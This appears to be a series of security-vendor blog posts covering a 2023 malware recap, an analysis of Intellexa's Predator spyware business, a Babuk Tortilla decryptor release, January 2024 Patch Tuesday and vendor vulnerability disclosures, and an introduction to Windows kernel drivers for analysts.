Year in Malware 2023: Recapping the major cybersecurity stories of the past year

  • Talos identified the most prolific Phobos variants, common affiliate tactics, techniques and procedures (TTPs), and characteristics of the Phobos affiliate structure. Our researchers looked at observed Phobos activity and analyzed more than 1,000 Phobos samples from VirusTotal dating back to 2019. We found that the 8Base group was increasingly deploying variants of Phobos via the SmokeLoader backdoor. We also found indications that Phobos could be available as a pay-for ransomware-as-a-service model. 

  • Talos discovered a malicious campaign that likely started as early as August 2023, delivering a new remote access trojan (RAT) we dubbed “SugarGh0st.” We found evidence suggesting the threat actor is targeting the Uzbekistan Ministry of Foreign Affairs and users in South Korea. SugarGh0st is believed to be a variant of the infamous Gh0st RAT, a years-old malware of Chinese origin. SugarGh0st is believed to be targeting users in Uzbekistan and South Korea. 

Year in Malware 2023: Recapping the major cybersecurity stories of the past year

  • Talos releases the details of Project PowerUp, an effort from multiple teams across Cisco to create a new, bespoke hardware device used to protect Ukraine’s power grid. The modified IoT switches allow the country’s power grid to be protected against GPS-jamming attacks, which traditionally tried to disrupt the way timing on the network worked. CNN first wrote about these efforts, and Joe Marshall, Talos’ researcher who spearheaded the project, wrote a firsthand account for the Talos blog.  

For further analysis of the threat landscape trends in 2023, download your copy of the Talos Year in Review. 

Intellexa and Cytrox: From fixer-upper to Intel Agency-grade spyware

21 December 2023 at 16:00
Intellexa and Cytrox: From fixer-upper to Intel Agency-grade spyware

By Mike Gentile, Asheer Malhotra and Vitor Ventura.

Editor’s note: This blog post is a public version of a talk presented at LabsCon 2023 on Sept. 22, 2023. You can watch a recording of the talk here. Some of the intelligence presented at LabsCon was later confirmed by an Amnesty International blog post released on Oct. 6, 2023.

  • Cisco Talos has a new, in-depth analysis of timelines, operating paradigms and procedures adopted by spyware vendor Intellexa (previously known as Cytrox). 
  • Talos’ analysis revealed that rebooting an iOS or Android device may not always remove the Predator spyware produced by Intellexa. Persistence is an add-on feature provided by Intellexa for their implants and primarily depends on the licensing options chosen by a customer.
  • Intellexa knows if their customers intend to perform surveillance operations on foreign soil.
  • Two years after its first public exposure, Intellexa’s Predator/Nova spyware solution continues to be undetected by anti-virus solutions. Public reporting on Intellexa’s operations has had little to no impact on their ability to conduct and grow their business across the world.
  • Almost all publications on malicious operations conducted using Intellexa’s spyware consist primarily of malicious domains as indicators of compromise (IOCs). Talos assesses that the disclosure of such domains, managed by the customers, has little to no effect on Intellexa’s operations and enables them to preserve their malware implants due to a lack of technical disclosures. 
  • After many users patched against the exploit chains used by Intellexa as of December 2021, the spyware vendor started shipping a new exploit chain to at least one new customer in early 2022 that covered the same and more recent versions of the Android operating system.

In May 2023, Cisco Talos published the first ever in-depth technical report on Intellexa’s spyware solution named Alien and Predator, showing its inner workings and demonstrating the highly complex software architecture decisions required to make such spyware work properly on the Android operating system. This research also sheds light on several other aspects of the commercial spyware space, like plausible deniability, the impacts of widespread media exposure and recruitment issues.

During the LabsCon 2023 cyber threat intelligence conference, Talos presented the operational risks inherent to the commercial spyware landscape, using Intellexa as a use case.

This research delves into the history of the Alien/Predator line of implants, illustrating how a run-down spyware seller, Cytrox, was bought and transformed into an intelligence agency-grade spyware vendor: Intellexa.

Implants’ persistence is an add-on in Intellexa’s offering

Leaked commercial proposals from the Intellexa Alliance have shown that prices per infection are increasing every year, along with the capabilities of the company's technological solution. Rebooting the device is no longer a means to remove the implants from an infected device. 

In 2021, Predator spyware couldn’t survive a reboot on the infected Android system (it had it on iOS). However, by April 2022, that capability was being offered to their customers. Since then, no reports have been published detailing such a mechanism, as there is no reason to believe it has become obsolete. It still doesn’t survive a factory reset, but it is fair to assume that this specific capability will become available, literally breaking all trust in the device beyond recovery.

Intellexa’s product development journey

Cytrox was first created in North Macedonia in 2017, and at the time, built Android-based malware. In 2018, Cytrox was acquired by WiSpear and then in 2019 Nexa Technologies, WiSpear (and Cytrox) and Senpai Technologies teamed up to create the Intellexa Alliance, a commercial spyware company that, according to public reports, sells commercial spyware to multiple customers without regard for their potential targets and the spyware’s misuse. 

Senpai Technologies is a company specializing in OSINT and persona creation based out of Israel, while WiSpear, also based in Israel, specializes in Wi-Fi interception. Nexa Technologies (now called RB 42) is a French-based company whose main focus is remote surveillance and security services.

Immediately after the consolidation of all these firms under Intellexa in May 2019, the revamping of Predator began, which at the time, was their flagship spyware for Android. This can be confirmed on the artifacts left on the malware binary due to the use of static library compilation at build time.

By April 2020, the revamp was finished and the malware was ready to be deployed on Android. In May 2020, the developers began working on an iOS “solution” which we assess with medium confidence was a port of Alien/Predator from Android to iOS. Our assessment is based on the fact that the engine that drives the high-level components of the Predator system is similar, if not identical, to the point where some Android artifacts, detailed in the following sections, can be found on the iOS sample.

Intellexa and Cytrox: From fixer-upper to Intel Agency-grade spyware
Evolution timeline

Pricing model

Building commercial spyware is a sophisticated and research-driven process. It involves meticulously circumventing, bypassing and exploiting security controls put in place by mobile applications/packages and Operating Systems such as Android and iOS. Combining such potent software into a package with zero or one-click zero-day exploits makes it a highly reliable offensive “solution” – and that is exactly what makes it expensive. As early as 2016, The New York Times reported that the NSO Group charged $650,000 for every 10 infections, with an additional $500,000 for initial setup. Multi-year deals between the NSO Group and Mexico were estimated to be around $15 million – and this was back in 2013.

Fast forward five years to 2021, and another disclosure from The New York Times details the proposal brochure for Intellexa’s Predator framework offering their solution for a whopping 13.6 million Euros for:

  • 20 concurrent infections.
  • One-click exploit for initial access.
  • Predator C2 and administrative hardware and software.
  • Project plans, documentation, etc.
  • 12 months of warranty support.
Intellexa and Cytrox: From fixer-upper to Intel Agency-grade spyware
Proposal (snipped) defining price and items

Leaked documents from 2022 show that the Nova platform, which is Intellexa’s data-gathering module, was priced at 8 million Euros in 2022. Price tags of 13.6 million or even 8 million Euros is a hefty sum. However, this reinforces the fact that commercial spyware such as those from Intellexa is neither for the common man nor for petty crimeware operators. These solutions are meant for customers with deep pockets and such expenses can only be incurred by state-sponsored agencies.

The pricing model also shows the technological evolution of the product. Based on the leaked proposal dates in July 2022, Intellexa had already incorporated boot survivability into the Android solution. It also increased the support for Android to 18 months. At this point, it is unclear if this is the direct result of Intellexa’s development and research capabilities, or if these are based on exploits acquired that ultimately would result in having such capabilities.

The original persistence mechanism on iOS was the exploitation of the original vulnerability during the boot process by loading the malicious HTML page stored locally. As such, the newly introduced Android persistence mechanism can simply be based on a similar method.

Plausible deniability

Intellexa’s commercial proposals are designed to create plausible deniability. These clauses extend from the infrastructure responsibilities to the delivery methods. This is a key aspect of Intellexa’s business model, the goal is to avoid a bad reputation and to claim they are not responsible for what their customers do with their “product” — they claim that they don’t even know who the victims are.

Intellexa and Cytrox: From fixer-upper to Intel Agency-grade spyware
Proposal (snipped) defining responsibilities

The leaked proposals show that the infrastructure and anonymization are the responsibility of the customer. From a deniability point of view, this enables the claim that Intellexa doesn’t know how victims are being targeted. From the operational risk perspective, such clauses also shield Intellexa from any responsibility in the event of a public exposure connecting malicious operations back to the vendor.

Intellexa and Cytrox: From fixer-upper to Intel Agency-grade spyware
Delivery method method

The delivery of Intellexa’s supporting hardware is done at a terminal or airport. This delivery method is known as Cost Insurance and Freight (CIF), which is part of the shipping industry’s jargon (“Incoterms”). This mechanism allows Intellexa to claim that they have no visibility of where the systems are deployed and eventually located. This exact scenario was seen being put into practice when, according to a LighthouseReports investigation, Intellexa sold their solution to the Sudanese government.

Intellexa and Cytrox: From fixer-upper to Intel Agency-grade spyware
Source: https://www.lighthousereports.com/investigation/flight-of-the-predator/

Even if we take into consideration the proposal’s terms such as, “Installation and configuration at customer designated facility…” and the “Standard training course ……,” it still does not mean that Intellexa might know where the hardware is located since everything can be done remotely or even without their personnel knowing where the customer’s “solution” is physically located.

Intellexa does have first-hand knowledge of if their software is being used to conduct surveillance operations targeting phone number prefixes other than their customers' country of origin and possibly their jurisdiction. This knowledge is a consequence of the licensing model. Any sale is limited to a single phone country code prefix, but for an additional fee, the customer can license the usage of the solution in additional countries without geographic limitations.

Business risks

Human resources

Commercial spyware companies don’t seem to have any kind of problem recruiting highly specialized human resources to develop their solutions. This was evidenced by the LinkedIn profiles of several highly specialized engineers. In one example, the NSO Group in June had just recruited new, highly specialized engineers from an Israeli intelligence military unit.

During the development of the iOS implant, Intellexa hired an iOS expert vulnerability researcher who had previously worked for the NSO Group for three years analyzing low-level hardware devices. The timing  (2021- present) of the hire by Intellexa indicates that the firm needed to integrate the implant with the exploit chain (including sandbox escape mechanisms) to deploy it reliably on iOS devices.

Such “experts” can be found working for and actively hunting for jobs regularly at other commercial spyware vendors too.  For example, a quick search by Talos showed that just in September 2023, the NSO group had hired another security researcher with the same research background - again, this time the researcher had worked for an Israeli military intelligence unit for about three years doing multiple tasks involving reverse engineering and application security.

Intellexa and Cytrox: From fixer-upper to Intel Agency-grade spyware
Example of employment history

And there are several examples like that. The highly skilled researchers will move from one company to another in the same line of business supplying a constant flow of human resources as needed.

Target operating system support

New operating system releases don’t seem to make a considerable impact on the Predator solution. Intellexa now supports OS versions going back 18 months on Android and 12 months on iOS from their last supported version, which may not be the latest. Google releases approximately one new version per year just like Apple. But, the Android OS may consist of beta versions months before general availability. This gives plenty of lead time to Intellexa and their exploit suppliers to develop new exploit chains to use as initial attack vectors. 

It is important to understand that the Alien/Predator implants themselves don’t need to change much between operating system releases. They are written to be as generic and modular as possible, and the modules that need to be specific to an OS version and/or capability are written in Python, which can easily be updated and deployed on the fly via a customer’s infrastructure. 

The components that are more sensitive to operating system updates are the initial access vectors and the persistence mechanisms. These capabilities often rely on exploits that can be patched or new mitigation techniques may render them useless. 

Vulnerability exploits chain patching

This is the most sensitive and least controlled part of any commercial spyware solution. Still, one may think that there is a high impact on the operational capability of a commercial spyware vendor, but the reality seems to prove the impact is low, or medium at most. 

Exploit brokers and exploit research companies, sell full or partial exploit chains as a subscription model where the customers are entitled to workable replacements if the purchased chain is patched.

The timeline of events shows that it took Intellexa, at most, six months (probably less) to obtain and integrate a new fully operational exploit chain into their solution, after their Android previous one was patched in Nov 2021. This is confirmed by the fact that, in May 2022, their platform was being shipped to a new customer in Sudan, according to the Lighthouse report.

Overall, this demonstrates that exposing the vulnerabilities used by commercial spyware vendors, although extremely important, does not impose much of a risk on them. In fact, that risk is transferred onto the exploit brokers and vendors.

This has caught the attention of the Biden-Harris administration, to the point that the Intellexa Alliance was added to the Entity List for “...determination that the companies engaged in trafficking in cyber exploits used to gain access to information systems…”  In practical terms, U.S.-based companies that deal in exploits cannot do business with the Intellexa galaxy of companies. This means that Intellexa will have to procure its exploits from companies in other regions, which for the time being, doesn’t seem to be a problem. However, if the United Kingdom and the European Union take similar actions, the market will become smaller, making it much harder for these companies to acquire their initial attack vector.

The lack of impact from public exposure

The public exposure of commercial spyware companies creates awareness and has gained the attention of governments and regulating bodies. Such disclosures have also been successful at attributing malicious operations conducted by regimes against human rights activists, journalists and civilian dissidents, indicating the lack of a moral compass of many of Intellexa’s “customers.” 

However, exposing regimes conducting these operations seems to have little effect on these companies’ abilities to make money. It may increase the costs by making them buy or create new exploit chains but these vendors appear to have seamlessly acquired new exploit chains, enabling them to remain in business by jumping from one set of exploits to another as a means of initial access. A majority of public disclosures in the commercial spyware space focus on the political aspects of the operations along with listing malicious domains and infrastructure but fail to tear open the inner workings of the malware themselves. The domains and infrastructure exposed in a disclosure are owned and operated by spyware customers themselves, often in silos, meaning that exposing one operation typically may have no impact on all the other customers. However, the risk of exposure will always be primarily based on the efforts put by the customer into their anonymization chain.

Such disclosures may have a substantial impact on the regimes (“customer”), but they fail to impose costs on the spyware vendor themselves. What is needed is the public disclosure of technical analyses of the mobile spyware and tangible samples enabling public scrutiny of the malware. Such public disclosures will not only enable greater analyses and drive detection efforts but also impose development costs on vendors to constantly evolve their implants.

Video series discussing the major threat actor trends from 2023

8 January 2024 at 10:30
Video series discussing the major threat actor trends from 2023

In this video series, Talos’ Director of Threat Intelligence and Interdiction Matt Olney and Head of Outreach Nick Biasini share their insights on the most significant cybersecurity threats from the past year.

From attacks on network infrastructure to the latest APT activities, as well as an update on our Ukraine Task Force, these short videos provide some great insights into the current cybersecurity threat environment.

You can learn more in the 2023 Talos Year in Review.

The increased targeting of networking devices

Ransomware and extortion

The activities of Advanced Persistent Threat actors (APTs)

Ukraine Task Force update

Recommendations for defenders

Video series discussing the major threat actor trends from 2023

Read the 2023 Cisco Talos Year in Review

Download Now

New decryptor for Babuk Tortilla ransomware variant released

9 January 2024 at 09:00
  • Cisco Talos obtained executable code capable of decrypting files affected by the Babuk Tortilla ransomware variant, allowing Talos to extract and share the private decryption key used by the threat actor.
  • Cisco Talos shared the key with our peers at Avast for inclusion in the Avast Babuk decryptor released in 2021. The decryptor includes all known private keys, allowing many users to recover their files once encrypted by different Babuk ransomware variants. 
  • Dutch Police, acting on threat intelligence supplied by Talos, identified, apprehended and the Dutch Prosecution Office prosecuted the threat actor behind Babuk Tortilla operations, demonstrating the power of cooperation between law enforcement agencies and commercial security organizations such as Talos and Avast.
New decryptor for Babuk Tortilla ransomware variant released

In cooperation with Dutch Police and Avast, Cisco Talos recovered a decryptor for encrypted files from systems affected by the Babuk ransomware variant known as Tortilla. We first described the operations of Tortilla ransomware in a blog post in November 2021

Dutch Police used the intelligence provided by Talos to discover and apprehend the actor behind this malware. During the Amsterdam Police operation, Talos obtained and analyzed the decryptor, recovered the decryption key and shared the key with engineers from Avast Threat Labs in charge of development and maintenance of the decryptor for several other Babuk variants. 

The generic Avast Babuk decryptor was already used as the de facto industry standard Babuk decryptor by many affected users and it made perfect sense to be updated with the keys Talos recovered from the Tortilla decryptor. 

This way, the users can access programs such as NoMoreRansom to download the single decryptor containing all currently known Babuk keys and do not have to choose between competing decryptors for individual variants.

Babuk source code is used as a basis of many ransomware variants

Babuk ransomware emerged in 2021, gaining notoriety for its high-profile attacks on targeted industries, especially those in healthcare, manufacturing, logistics and public services, including critical infrastructure.

Babuk can be compiled for several hardware and software platforms. The compilation is configured through a ransomware builder. Windows and ARM for Linux are the most commonly used versions, but ESX and a 32-bit, older PE executable were also observed over time. 

Babuk ransomware is nefarious by its nature and while it encrypts the victim's machine, it interrupts the system backup process and deletes the volume shadow copies. The source code of the Babuk ransomware leaked in an underground forum in September 2021 by an alleged insider, opening the door for other cybercriminals to utilize and potentially enhance the ransomware and increase the threat level for businesses and organizations worldwide.

Talos recently analyzed the operations of the RA ransomware group and other groups basing their ransomware on the leaked Babuk source code, documenting 10 different actors using it. 

New decryptor for Babuk Tortilla ransomware variant released
Timeline of ransomware families leveraging leaked Babuk ransomware code.

Cisco Talos discovered a Tortilla campaign in our product telemetry on Oct. 12, 2021, targeting vulnerable Microsoft Exchange servers and attempting to exploit the ProxyShell vulnerability to deploy the Babuk ransomware in the victim's environment. 

The actor used a specific infection chain technique where an intermediate unpacking module is hosted on a pastebin.com clone, pastebin.pl. The intermediate unpacking stage was downloaded and decoded in memory before the final payload embedded within the original sample was decrypted and executed.

Babuk Tortilla decryptor is a standard decryptor provided by the threat actor

The Babuk Tortilla decryptor obtained by Cisco Talos was likely created from the leaked Babuk source code and the generator. An actor wishing to utilize the ransomware toolkit has to generate a public/private key pair to be used in the operation. The key pair can also be generated per campaign but we have no indication of other keys used by the Tortilla actor. Instead, a single key pair is used to attack all their victims. 

The public key is deployed to the ransomware payload where it is used in the infection process to encrypt the per-file symmetric encryption/decryption key. That is then appended to the end of every encrypted file with the encryption marker and additional metadata. This allows the specific decryptor to recognize the fact that a file is encrypted and decrypt the symmetric key using the private key embedded in the body of the specially crafted decryptor tool created by the threat actor. 

New decryptor for Babuk Tortilla ransomware variant released
Recursive decryptor function for traversing file system is not efficient.

The decryption process used by the original decryptor is rather slow due to the inefficiency of the routine used to traverse the file system. Although the decryptor supplied by the threat actor works, Cisco Talos made the decision to not share any executable code created by the threat actor, as it may expose production environments to untrusted code. The approach we took was to extract the private key from the decryptor and add the key to the list of keys supported by the Avast Babuk decryptor

Generic Babuk decryptor helps users to recover their files

The Avast Babuk decryptor is optimized for performance and allows users to recover their files very quickly if the Babuk variant uses one of the known private decryption keys. The initial decryptor was released in October 2021, and it has been actively supported by Avast Threat Labs’ engineers. 

Its simple user interface allows even users with minimal experience in ransomware recovery to easily understand its usage and purpose.

New decryptor for Babuk Tortilla ransomware variant released
Avast Babuk decryptor can be used to decrypt files encrypted by the Babuk Tortilla variant.

Users affected by Tortilla ransomware operations can download the updated version of the Babuk decryptor from the NoMoreRansom decryptors page or the Avast decryptors download page

Cisco Talos would like to thank the Dutch Police and Avast for their cooperation and we look forward to working with them on other similar projects.

Microsoft starts off new year with relatively light Patch Tuesday, no zero-days

9 January 2024 at 18:58
Microsoft starts off new year with relatively light Patch Tuesday, no zero-days

Microsoft followed up one of the lightest recent Patch Tuesdays in December with another month of no zero-day vulnerabilities and only two critical issues.   

Many of the company’s monthly security updates in 2023 included vulnerabilities that were actively being exploited in the wild or had publicly available exploits already in circulation.   

The company started out 2024 by disclosing 48 vulnerabilities on Tuesday across its suite of products and services, 46 of which are considered of “important” severity. 

One of the critical vulnerabilities patched Tuesday is CVE-2024-20674, a security bypass vulnerability in the Windows Kerberos authentication protocol. An attacker could carry out a man-in-the-middle attack to exploit this vulnerability and spoof the Kerberos authentication server, therefore bypassing the authentication process. 

Because of Keberos’ presence on several of the most popular operating systems, Microsoft considers this vulnerability “more likely” to be exploited.  

The other critical issue is CVE-2024-20700, which can lead to remote code execution. This vulnerability in Windows Hyper-V can be exploited if an adversary wins a race condition. Also, they must first gain access to a restricted network before an exploit can work. 

There are two other remote code execution vulnerabilities that are worth mentioning, both of which Microsoft considers to be of “important” severity: CVE-2024-21307, which exists in Windows Remote Desktop Client, and CVE-2024-21318, which affects SharePoint Server. 

In the case of CVE-2024-21307, the vulnerability can be triggered if an authenticated user connects to a malicious remote desktop server where the remote desktop host server sends a specially crafted Server RDP Preconnection that targets the remote client's drive redirection virtual channel. This could lead to remote code execution on the victim's machine. 

CVE-2024-21318 is relatively easier for an attacker to hypothetically exploit, only requiring them to write and inject specific code to SharePoint Server.

The Windows Kernel also contains an elevation of privilege vulnerability, CVE-2024-20698, which could allow an attacker to gain SYSTEM privileges. There is little other information on how an attacker could exploit this vulnerability. 

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 62847 – 62850 and 62854 – 62861. There are also Snort 3 rules 300797 – 300802. 

Critical vulnerability in ManageEngine could lead to file creation, dozens of other vulnerabilities disclosed by Talos to start 2024

17 January 2024 at 17:00
Critical vulnerability in ManageEngine could lead to file creation, dozens of other vulnerabilities disclosed by Talos to start 2024

Cisco Talos’ Vulnerability Research team has disclosed dozens of vulnerabilities over the past month, including more than 30 advisories in GTKWave and a critical vulnerability in ManageEngine OpManager. 

Cisco ASIG also recently discovered an information disclosure vulnerability in DuoUniversalKeycloakAuthenticator, an authentication solution for Keycloak, an open-source identity and access management solution.  

There are also multiple vulnerabilities in AVideo, an open-source video broadcasting suite, that could lead to arbitrary code execution. 

All the vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

ManageEngine OpManager directory traversal vulnerability 

Discovered by Marcin “Icewall” Noga. 

A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager, a network management solution. 

TALOS-2023-1851 (CVE-2023-47211) can be exploited if an adversary sends a target a specially crafted HTTP request, which could allow them to create a file in any location outside of the default MiBs file’s location directory. This vulnerability has a critical severity score of 9.1 out of 10. 

This vulnerability arises if the adversary uses OpManager and navigates to Settings -> Tools -> MiB Browser and selects “Upload MiB.” The arbitrary file they could eventually create can only be one of a few file extensions, however, including .txt, .mib and .mi2. 

Multiple vulnerabilities in GTKWave 

Discovered by Claudio Bozzato. 

Cisco Talos recently discovered multiple vulnerabilities in the GTKwave simulation tool, some of which could allow an attacker to execute arbitrary code on the targeted machine. 

GTKwave is a wave viewer used to run different FPGA simulations. It includes multiple versions to run on macOS, Linux, Unix and Microsoft machines. The open-source software analyzes trace files to look at the results of simulations run across different design implementations, or to analyze protocols captured with logic analyzers.  

Talos researchers found a wide array of security issues across this software that affect different functions in GTKwave, many of which are triggered if an attacker can trick the targeted user into opening a specially crafted malicious file. In all, Talos recently released 33 advisories that cover more than 80 CVEs. Many of these issues are caused by the reuse of vulnerable code across the software. Other vulnerabilities are often duplicated by the adversary sending different file types as the initial infection document. 

There are eight integer overflow vulnerabilities that could result in memory corruption, and eventually, arbitrary code execution: TALOS-2023-1812 (CVE-2023-38618, CVE-2023-38621, CVE-2023-38620, CVE-2023-38619, CVE-2023-38623, CVE-2023-38622), TALOS-2023-1816 (CVE-2023-35004), TALOS-2023-1822 (CVE-2023-35989), TALOS-2023-1798 (CVE-2023-36915, CVE-2023-36916), TALOS-2023-1777 (CVE-2023-32650), TALOS-2023-1824 (CVE-2023-39413, CVE-2023-39414), TALOS-2023-1790 (CVE-2023-35992) and TALOS-2023-1792 (CVE-2023-35128). 

The most common vulnerability type Talos researchers found in GTKWave were out-of-bounds write issues that could lead to arbitrary code execution. All the following vulnerabilities could be exploited if a target opened an attacker-created file: 

TALOS-2023-1807 (CVE-2023-37921, CVE-2023-37923, CVE-2023-37922) can also lead to remote code execution, but in this case, is caused by an arbitrary write issue. 

For a complete list of all the vulnerabilities Talos discovered in GTKWave, refer to our Vulnerability Reports page here

DuoUniversalKeycloakAuthenticator for Keycloak 

Discovered by Benjamin Taylor of Cisco ASIG. 

An information disclosure vulnerability exists in the instipod DuoUniversalKeycloakAuthenticator for Keycloak. Keycloak is an open-source identity and access management solution, and DuoUniversalKeyAuthenticator allows Keycloak to push a Cisco Duo notification to the Duo app, asking the user to authenticate in.  

The Keycloak extension for Duo, after it detects that initial authentication has succeeded with Keycloak, redirects the user’s browser to the configured duosecurity.com endpoint, sending the username and password in question each time. 

TALOS-2023-1907 (CVE-2023-49594) indicates that this is unnecessary exposure of this data, potentially allowing an attacker to steal or view this information. 

Multiple vulnerabilities in WWBN AVideo 

Discovered by Claudio Bozzato. 

WWBN AVideo contains multiple vulnerabilities that an attacker could exploit to carry out a range of malicious actions, including brute-forcing user credentials and forcing a targeted user to reset their password to something the attacker knows. 

AVideo is a web application, mostly written in PHP, that allows users to create audio and video sharing websites. Users can import videos from other sources, like YouTube, encode the videos and then make them shareable in various ways. 

There are multiple cross-site scripting vulnerabilities in AVideo that could allow an attacker to execute arbitrary JavaScript code on the targeted machine: 

An attacker could exploit these vulnerabilities by tricking a user into visiting a specially crafted web page. 

There are three other vulnerabilities — TALOS-2023-1869 (CVE-2023-47171), TALOS-2023-1881 (CVE-2023-49738) and TALOS-2023-1880 (CVE-2023-49864, CVE-2023-49863, CVE-2023-49862) — that could allow adversaries to read arbitrary files with an HTTP request targeting different parameters in AVideo’s “objects/aVideoEncoderReceiveImage.json.php” file. 

Talos researchers also discovered TALOS-2023-1896 (CVE-2023-49589), an insufficient entropy vulnerability that can allow an attacker to forge a password reset for an administrator account. This could allow an adversary to reset a user’s account, set a new password that only the adversary knows, and then log in with that account information. An adversary could also exploit TALOS-2023-1897 (CVE-2023-50172) to prevent AVideo from sending an email to the associated account’s email address alerting them of the password reset process, so exploitation becomes less evident. 

Similarly, TALOS-2023-1900 (CVE-2023-49599) can also be exploited using this method, but this vulnerability targets administrator accounts. 

The most serious vulnerability Talos discovered in AVideo is TALOS-2023-1886 (CVE-2023-47862), a local file inclusion vulnerability that could eventually lead to arbitrary code execution. This vulnerability has a severity score of 9.8 out of 10. TALOS-2023-1885 (CVE-2023-49715) is an unrestricted php file upload vulnerability that can also lead to code execution, but only when used in conjunction with a local file inclusion vulnerability like TALOS-2023-1886. 

TALOS-2023-1898 (CVE-2023-49810) could be exploited in AVideo by sending a specially crafted HTTP request. An adversary could exploit this vulnerability to bypass the CAPTCHA process when trying to log into the service, therefore making it easier for an attacker to attempt to brute force login credentials or password-guessing attacks. 

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers

18 January 2024 at 13:00
Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers

Drivers have long been of interest to threat actors, whether they are exploiting vulnerable drivers or creating malicious ones. Malicious drivers are difficult to detect and successfully leveraging one can give an attacker full access to a system. Real-world examples can be found in our previous research into the driver-based browser hijacker RedDriver and HookSignTool — a signature timestamp forging tool.

With the existence of malicious drivers, there is a need for those who can analyze identified samples. This analysis requires specific knowledge of the Windows operating system, which can be difficult to acquire. Windows drivers and the kernel can be overwhelming to learn about, as these topics are vast and highly complex. The documentation available on these subjects is daunting and difficult to navigate for newcomers, even for those with programming experience. This initial hurdle and steep learning curve create a high barrier of entry into the subject. To many, the kernel space seems to be an arcane and hidden part of the operating system. 

This series is a high-level introduction and overview of drivers and the Windows kernel for those interested in malicious driver research, but do not have experience with them. However, previous experience with basic Windows concepts like processes, threads, the registry and common system files is recommended, along with experience or familiarity with disassemblers and C or C++ programming. In the future it may be advantageous to acquire experience with the Rust programming language, as Microsoft has slowly started to migrate portions of the Windows 11 kernel over to Rust. 

This series intends to serve as a starting point for learning about malicious drivers and to lower the barrier of entry into the subject. Each portion of this series will build on the last, but first, we’ll introduce the basic concepts of drivers and the Windows kernel and the I/O system. 

In the next entry, we’ll expand on the I/O system and driver operations. Eventually, we’ll get to topics like the security concepts surrounding drivers and how they can be used in a malicious context, and basic driver analysis and how to identify a malicious driver.

Links to external resources for further information on relevant subjects will be provided to supplement this blog post. It is highly recommended to explore the links, as this blog series is meant to serve as a broad introduction to concepts rather than detailed instruction. A list of recommended resources for further reading will also be provided.

The Windows kernel

Kernel mode vs. User mode

The Windows operating system (OS) is split into two layers or “modes:” User mode, where the files and applications that users interact with reside, and kernel mode, where kernel-mode drivers and the underpinnings of Windows perform the necessary functions to run the system. Splitting the operating system into two modes creates a highly controlled logical barrier between the average user and the Windows kernel. This barrier is necessary to maintain the integrity and security of the system, as the kernel is a highly complex and fragile environment.

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers

In memory, the two modes are logically separated into two “virtual” address spaces. Within the user-mode address space, applications open a process when executed and run in separate private virtual memory spaces. If a user-mode process crashes, running in private memory spaces allows the system to continue operating and handle the crashed process accordingly. However, in kernel mode, drivers all run in the same virtual address space along with the operating system itself. If a driver mistakenly writes to the address of another driver or the operating system, the entire system crashes to prevent damage, resulting in what is commonly known as the “Blue Screen of Death” (BSOD). In other words, it's easy to crash the system with a driver, so they must be written carefully.

Kernel concepts 

The Windows kernel is an intensely complex subject, warranting entire books and courses dedicated to different aspects of its functionality. It would not be possible to thoroughly describe the kernel in just one blog post. However, we will introduce the basics by discussing drivers and how they interact with the operating system. This will provide a foothold for starting the process of learning about the kernel and drivers in greater detail. 

The kernel-mode layer is composed of an array of different components that work in concert to run the system. As the chart below shows, kernel mode is further divided into different layers.

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers
Important note: The above chart is a simplified representation of the Windows kernel. Many components are not represented here as they are outside the scope of this blog post.

As can be seen above, drivers run in kernel mode rather than in user mode with applications. Kernel mode can be seen as the underlying infrastructure of the OS that is never directly interacted with by a typical user. Although the layers are logically separated, information is still exchanged between the layers through highly controlled channels. 

In modern operating systems, a systems privilege model is typically divided into logical layers commonly represented as “rings.” Each ring represents a level of privilege, with the outermost ring being the least privileged and the center ring — the kernel — is the highest privileged. An application in the outer ring cannot directly perform actions that require the privilege of an inner ring. This model is referred to as “hierarchical protection domains” or simply as “protection rings.”

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers

The protection rings model is designed to prevent faults and malicious activity by restricting direct access to system resources. Any actions from an outer ring that require higher privileges must make a “system call” (also known as a syscall). Making a syscall begins a chain of functions that ultimately performs the intended action in the kernel at Ring 0. As an example, if an application were to execute the Windows API function OpenProcess, the flow of execution would look like this in an x64 system:

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers

In Ring 3, each function in the flow of execution is effectively a wrapper for the next function in the chain, each one passing execution to the next. However, once NtOpenProcess in ntdll.dll is called, the next step is making the actual syscall to the kernel which in turn executes KiSystemCall64 — the system service dispatcher.

Once it receives a syscall, KiSystemCall64 retrieves the address of the requested function from the System Service Descriptor Table (SSDT); a table of addresses of kernel functions that have been mapped for use by system calls. Once the appropriate address has been located, the requested function will execute.

Executive layer

Within kernel mode is another layer referred to as the “executive layer,” which contains several components that provide functions and services for drivers:

These are referred to as “managers” and each provides an interface to its various functions for drivers to use. Each manager is responsible for a specific area of functionality, such as object management or memory management. The manager names are fairly self-explanatory, but each will be discussed in this blog series when necessary. To further understand the various managers we recommend exploring the MSDN links provided in the list above.

A large portion of the behavior observed while analyzing malicious drivers will be related to functions that are provided by the executive layer manager interfaces. Later in this series, we will discuss how the I/O manager plays a large role in the operations of drivers, including malicious ones. 

Hardware abstraction layer (HAL)

Below the kernel sits the hardware abstraction layer (HAL) which can be described as an intermediary layer between the hardware and the rest of the OS. In Windows, the HAL is implemented in the aptly named “hal.dll.” The HAL facilitates communication between the OS and the physical hardware and provides a standard interface to processor resources. An important feature of the HAL is that it allows Windows to operate on different CPU architectures by implementing different versions of the HAL depending on the architecture. 

As opposed to many DLLs, most of the functions exported by hal.dll are not intended to be called directly by a programmer via an application or driver but are intended to be used by other modules and components in the system. Most of the functions hal.dll exports are undocumented and many are obsolete holdovers from previous Windows versions. 

Drivers

What do drivers do?

